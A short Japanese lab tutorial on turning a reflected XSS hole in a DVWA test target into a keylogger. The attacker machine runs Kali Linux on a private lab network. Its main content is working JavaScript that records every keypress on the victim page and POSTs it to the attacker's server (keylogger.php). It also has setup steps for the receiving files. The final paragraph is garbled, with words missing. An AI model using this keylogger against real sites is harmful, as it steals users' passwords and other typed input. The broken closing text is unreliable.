XSSホールを利用したキーボードレコーダの実現

XSSホールを利用したキーボードレコーダの実現
本実験は反射性のXSSホールを例として実験環境を示したものである.dviwaターゲット(ip:192.168.135.140)カリlinux(ip:192.168.135.138)
1.まずはcailでapacheサービスを開始する

/etc/init.d/apache2 start

firefoxアドレスバーに入力:http://192.168.135.138 またはhttp://localhost appacheがオープンしているかどうかを検出します.以下を見れば 2.var/www/htmlに三つのファイルを作成します.(1)keylogger.js【リモートjsスクリプトファイル】

document.onkeypress = function(evt) {
    evt = evt || window.event
    key = String.fromCharCode(evt.charCode)
    if (key) {
        var http = new XMLHttpRequest();
        var param = encodeURI(key)
        http.open("POST","http://192.168.135.138/keylogger.php",true);
        http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        http.send("key="+param);
    }
}                  

(2)keylogger.php【キーボードで打つための記録をPOSTでkeylog.txtに送る】

(3)keylog.txt【空のファイルはキーボードの記録を受信するために使う】
2.XSSホールテスト開始(1)ブラウザでdwaターゲットにアクセスし、(2)を登録して入力ボックスに以下のコードを入力する.

または、hackbarプラグイン(3)を して、このページで にキーボードを いて、keylog.txtが されているかどうかによって の と が しているかどうかを する.